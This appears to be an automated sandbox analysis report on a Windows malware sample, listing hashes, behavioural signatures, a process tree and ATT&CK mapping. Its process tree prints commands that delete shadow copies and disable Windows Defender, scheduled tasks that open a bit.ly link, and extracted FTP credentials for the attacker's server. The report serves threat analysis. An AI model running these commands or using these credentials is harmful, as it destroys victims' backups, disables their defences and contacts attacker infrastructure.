Analysis
-
max time kernel
152s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
04-10-2022 21:22
Behavioral task
behavioral1
Sample
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Resource
win10v2004-20220901-en
General
-
Target
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
-
Size
242KB
-
MD5
10e6c5653d2929236947ca08594f0f55
-
SHA1
9ed6646ef7f0815d02066b60cd7bbc8d27cbf360
-
SHA256
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
-
SHA512
8db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
-
SSDEEP
6144:mQvE/UVPy/oCa+LDZWC9z5NUb+knq1diDmN:3vzPygCa+DZCnq1c+
Malware Config
Extracted
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/4892-132-0x0000014CFD310000-0x0000014CFD352000-memory.dmp disable_win_def behavioral2/files/0x0001000000022e13-170.dat disable_win_def behavioral2/files/0x0001000000022e13-171.dat disable_win_def -
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Drivers directory 1 IoCs
Processes:
SystemPropertiesPerformance.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts SystemPropertiesPerformance.exe -
Executes dropped EXE 2 IoCs
Processes:
SystemPropertiesPerformance.exeiscsicli.exepid Process 3576 SystemPropertiesPerformance.exe 5040 iscsicli.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exeSystemPropertiesPerformance.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation SystemPropertiesPerformance.exe -
Drops desktop.ini file(s) 3 IoCs
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exeSystemPropertiesPerformance.exedescription ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe File created C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini SystemPropertiesPerformance.exe File created C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe -
Enumerates connected drives 3 TTPs 17 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc Process File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 748 schtasks.exe 1940 schtasks.exe 1172 schtasks.exe 4468 schtasks.exe 1192 schtasks.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 796 vssadmin.exe 4484 vssadmin.exe 3016 vssadmin.exe 3648 vssadmin.exe 2008 vssadmin.exe 2080 vssadmin.exe 360 vssadmin.exe 4004 vssadmin.exe 4940 vssadmin.exe 4736 vssadmin.exe 5016 vssadmin.exe 4340 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeiscsicli.exepid Process 3548 powershell.exe 3548 powershell.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe 5040 iscsicli.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exevssvc.exe851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exeSystemPropertiesPerformance.exeiscsicli.exedescription pid Process Token: SeDebugPrivilege 3548 powershell.exe Token: SeBackupPrivilege 1116 vssvc.exe Token: SeRestorePrivilege 1116 vssvc.exe Token: SeAuditPrivilege 1116 vssvc.exe Token: SeDebugPrivilege 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Token: SeBackupPrivilege 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Token: SeSecurityPrivilege 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Token: SeBackupPrivilege 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Token: SeDebugPrivilege 3576 SystemPropertiesPerformance.exe Token: SeDebugPrivilege 3576 SystemPropertiesPerformance.exe Token: SeDebugPrivilege 5040 iscsicli.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 4892 wrote to memory of 3548 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 85 PID 4892 wrote to memory of 3548 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 85 PID 4892 wrote to memory of 2420 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 87 PID 4892 wrote to memory of 2420 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 87 PID 4892 wrote to memory of 1344 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 113 PID 4892 wrote to memory of 1344 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 113 PID 4892 wrote to memory of 4688 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 89 PID 4892 wrote to memory of 4688 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 89 PID 4892 wrote to memory of 2264 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 90 PID 4892 wrote to memory of 2264 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 90 PID 4892 wrote to memory of 4412 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 110 PID 4892 wrote to memory of 4412 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 110 PID 4892 wrote to memory of 4596 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 91 PID 4892 wrote to memory of 4596 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 91 PID 4892 wrote to memory of 4140 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 92 PID 4892 wrote to memory of 4140 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 92 PID 4892 wrote to memory of 1944 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 105 PID 4892 wrote to memory of 1944 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 105 PID 4892 wrote to memory of 3484 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 93 PID 4892 wrote to memory of 3484 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 93 PID 4892 wrote to memory of 4260 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 95 PID 4892 wrote to memory of 4260 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 95 PID 4892 wrote to memory of 4384 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 97 PID 4892 wrote to memory of 4384 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 97 PID 4892 wrote to memory of 1364 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 99 PID 4892 wrote to memory of 1364 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 99 PID 4892 wrote to memory of 856 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 101 PID 4892 wrote to memory of 856 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 101 PID 2420 wrote to memory of 4736 2420 cmd.exe 107 PID 2420 wrote to memory of 4736 2420 cmd.exe 107 PID 1344 wrote to memory of 4488 1344 cmd.exe 114 PID 1344 wrote to memory of 4488 1344 cmd.exe 114 PID 4412 wrote to memory of 360 4412 cmd.exe 116 PID 4412 wrote to memory of 360 4412 cmd.exe 116 PID 2264 wrote to memory of 2080 2264 cmd.exe 115 PID 2264 wrote to memory of 2080 2264 cmd.exe 115 PID 3484 wrote to memory of 796 3484 cmd.exe 120 PID 3484 wrote to memory of 796 3484 cmd.exe 120 PID 1944 wrote to memory of 4004 1944 cmd.exe 118 PID 1944 wrote to memory of 4004 1944 cmd.exe 118 PID 4140 wrote to memory of 5016 4140 cmd.exe 119 PID 4140 wrote to memory of 5016 4140 cmd.exe 119 PID 4260 wrote to memory of 4340 4260 cmd.exe 121 PID 4260 wrote to memory of 4340 4260 cmd.exe 121 PID 4688 wrote to memory of 4484 4688 cmd.exe 122 PID 4688 wrote to memory of 4484 4688 cmd.exe 122 PID 856 wrote to memory of 4940 856 cmd.exe 123 PID 856 wrote to memory of 4940 856 cmd.exe 123 PID 4384 wrote to memory of 3016 4384 cmd.exe 124 PID 4384 wrote to memory of 3016 4384 cmd.exe 124 PID 4596 wrote to memory of 3648 4596 cmd.exe 125 PID 4596 wrote to memory of 3648 4596 cmd.exe 125 PID 1364 wrote to memory of 2008 1364 cmd.exe 126 PID 1364 wrote to memory of 2008 1364 cmd.exe 126 PID 4892 wrote to memory of 1940 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 131 PID 4892 wrote to memory of 1940 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 131 PID 4892 wrote to memory of 1172 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 132 PID 4892 wrote to memory of 1172 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 132 PID 4892 wrote to memory of 4468 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 135 PID 4892 wrote to memory of 4468 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 135 PID 4892 wrote to memory of 1192 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 137 PID 4892 wrote to memory of 1192 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 137 PID 4892 wrote to memory of 748 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 139 PID 4892 wrote to memory of 748 4892 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 139 -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid Process 4340 attrib.exe 4400 attrib.exe 2348 attrib.exe 3336 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe"C:\Users\Admin\AppData\Local\Temp\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4736
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4484
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2080
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3648
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5016
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:796
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4340
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3016
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2008
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
PID:4940
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4004
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:360
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵PID:4488
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "00:35" /sc daily /mo "2" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
PID:1940
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "16:35" /sc daily /mo "1" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
PID:1172
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "15:16" /sc daily /mo "1" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
PID:4468
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "00:07" /sc weekly /mo "4" /d "Mon" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
PID:1192
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "07:20" /sc monthly /m "nov" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
PID:748
-
-
C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe"C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
PID:3576 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib -H -R -S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe" & attrib -H -R -S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D3⤵PID:1664
-
C:\Windows\system32\attrib.exeattrib -H -R -S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe"4⤵
- Views/modifies file attributes
PID:4340
-
-
C:\Windows\system32\attrib.exeattrib -H -R -S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D4⤵
- Views/modifies file attributes
PID:3336
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +R +S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe" & attrib +H +R +S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D3⤵PID:3400
-
C:\Windows\system32\attrib.exeattrib +H +R +S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe"4⤵
- Views/modifies file attributes
PID:4400
-
-
C:\Windows\system32\attrib.exeattrib +H +R +S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D4⤵
- Views/modifies file attributes
PID:2348
-
-
-
C:\Users\Admin\AppData\Roaming\addins\iscsicli.exe"C:\Users\Admin\AppData\Roaming\addins\iscsicli.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1116
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Modify Existing Service
2Scheduled Task
1Defense Evasion
Disabling Security Tools
2File Deletion
2Hidden Files and Directories
1Modify Registry
3Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
242KB
MD510e6c5653d2929236947ca08594f0f55
SHA19ed6646ef7f0815d02066b60cd7bbc8d27cbf360
SHA256851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
SHA5128db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
-
Filesize
242KB
MD510e6c5653d2929236947ca08594f0f55
SHA19ed6646ef7f0815d02066b60cd7bbc8d27cbf360
SHA256851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
SHA5128db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
-
Filesize
90KB
MD514efef5a091b2e4189b9103ddb849936
SHA185d4fd4436d4d87731ea83da4350265e5d6d6622
SHA256a1e65e10ae43f8e437ab824e29231b69a8458b4aebd8a77ac27d22b70169dae6
SHA51219bef3582ac2c23ebf253a11e9da33bedcb09f935bd63ba0ff37827e8e144554dcf8e40bf6d6a0ba2d81082f27571e274ae32ce657702b53ddd827189ea70442
-
Filesize
90KB
MD514efef5a091b2e4189b9103ddb849936
SHA185d4fd4436d4d87731ea83da4350265e5d6d6622
SHA256a1e65e10ae43f8e437ab824e29231b69a8458b4aebd8a77ac27d22b70169dae6
SHA51219bef3582ac2c23ebf253a11e9da33bedcb09f935bd63ba0ff37827e8e144554dcf8e40bf6d6a0ba2d81082f27571e274ae32ce657702b53ddd827189ea70442